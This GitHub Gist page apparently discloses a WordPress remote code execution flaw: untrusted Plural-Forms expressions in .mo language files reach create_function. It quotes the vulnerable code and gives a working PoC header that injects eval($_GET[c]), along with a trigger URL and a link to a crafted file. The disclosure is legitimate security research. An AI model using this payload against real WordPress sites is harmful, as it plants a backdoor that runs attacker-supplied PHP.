Skip to content

Instantly share code, notes, and snippets.

/.md Secret

Created October 8, 2016 13:05
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
WordPress RCE via specially crafted .mo language file
Raw
.md

WordPress RCE via specially crafted .mo language file

The vulnerability code in wp-includes/pomo/translations.php:

  function make_plural_form_function($nplurals, $expression) {
        $expression = str_replace('n', '$n', $expression);
        $func_body = "
            \$index = (int)($expression);
            return (\$index < $nplurals)? \$index : $nplurals - 1;";
        return create_function('$n', $func_body);
  }

PHP's create_function() function internally performs zend_eval_stringl(), so an attacker can use } close the anonymous function and execute arbitrary code in the process of creating the anonymous function :-)

PoC:

Plural-Forms: nplurals=1; plural=n);}eval($_GET[c]);/*;

I provide crafted .mo language file, you can set default language to chinese, then access to the following URL and the phpinfo() function will be executed.

/index.php?c=phpinfo();

The crafted .mo language file: https://drive.google.com/file/d/0ByqJ6Vtb_VsYbkw5U0F4QzBrUnM

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment